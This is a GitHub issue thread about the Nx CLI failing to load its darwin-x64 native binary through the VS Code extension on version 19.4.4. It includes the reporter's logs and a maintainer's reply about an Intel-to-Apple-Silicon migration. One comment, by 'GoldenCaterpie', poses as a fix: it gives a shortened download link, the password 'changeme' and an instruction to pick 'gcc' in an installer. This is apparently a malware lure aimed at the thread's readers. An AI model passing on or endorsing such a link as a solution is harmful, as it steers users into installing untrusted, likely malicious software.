### ISSUE TITLE
Missing Platform Dependency - v19.4.4 - darwin-x64

### ISSUE THREAD

**Issue by KaliaHayes** [nrwl/nx#27655]
### Current Behavior

I am trying to solution #27263 by reverting from latest to Nx v19.4.4. Running into different issues on both versions.

Issues w/latest Nx:

- Cannot use the VSC Extension to run `npx nx run angular-monorepo:serve` task - getting exact output as stated in #27263
- Running this same command manually works as intended

I saw that it was recommended to revert to v19.4.4, which I did, but I'm now running into another set of issues.

----

Issues w/v19.4.4:

- Cannot use the VSC Extension to run `npx nx run angular-monorepo:serve` task - getting:

```
NX   Missing Platform Dependency

The Nx CLI could not find or load the native binary for your supported platform (darwin-x64).
This likely means that optional dependencies were not installed correctly, or your system is missing some system dependencies.
For more information please see https://nx.dev/troubleshooting/troubleshoot-nx-install-issues


 *  The terminal process "/bin/zsh '-l', '-c', 'npx nx run angular-monorepo:serve'" terminated with exit code: 1. 
 *  Terminal will be reused by tasks, press any key to close it. 

```

- Running this same command manually works as intended

### Expected Behavior

Expected behavior is to serve the application using the Nx VSC extension.

### Steps to Reproduce

1. Run `npx create-nx-workspace@19.4.4 angular-monorepo --preset=angular-monorepo`
2. Use the Nx VSC Extension to serve the application
3. Followed troubleshooting steps listed - https://nx.dev/troubleshooting/troubleshoot-nx-install-issues#how-to-fix
4. Delete `node_modules` and `package-lock.json`
5. Run `npm i`
6. Retry - failed

### Nx Report

```shell
NX   Report complete - copy this into the issue template

Node   : 20.9.0
OS     : darwin-arm64
npm    : 10.1.0

nx (global)        : 19.4.4
nx                 : 19.4.4
@nx/js             : 19.4.4
@nx/jest           : 19.4.4
@nx/linter         : 19.4.4
@nx/eslint         : 19.4.4
@nx/workspace      : 19.4.4
@nx/angular        : 19.4.4
@nx/cypress        : 19.4.4
@nx/devkit         : 19.4.4
@nx/eslint-plugin  : 19.4.4
@nrwl/tao          : 19.4.4
@nx/web            : 19.4.4
@nx/webpack        : 19.4.4
typescript         : 5.4.5
---------------------------------------
Registered Plugins:
@nx/cypress/plugin
@nx/eslint/plugin
```

### Failure Logs

```shell
NX   Missing Platform Dependency

The Nx CLI could not find or load the native binary for your supported platform (darwin-x64).
This likely means that optional dependencies were not installed correctly, or your system is missing some system dependencies.
For more information please see https://nx.dev/troubleshooting/troubleshoot-nx-install-issues


 *  The terminal process "/bin/zsh '-l', '-c', 'npx nx run puma-automation-ui:serve'" terminated with exit code: 1. 
 *  Terminal will be reused by tasks, press any key to close it.
```

### Operating System

- [X] macOS
- [ ] Linux
- [ ] Windows
- [ ] Other (Please specify)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jaysoo** [comment]
Hi @KaliaHayes, it is odd that you are on `darwin-arm64` but getting a missing dep on `darwin-x64`. Perhaps you migrated your MacOS from an Intel (x64) machine to a machine with Apple Silicon (arm64)?

If that's the case, you will need to uninstall your toolchain, including Node, and reinstall them with the proper architecture.
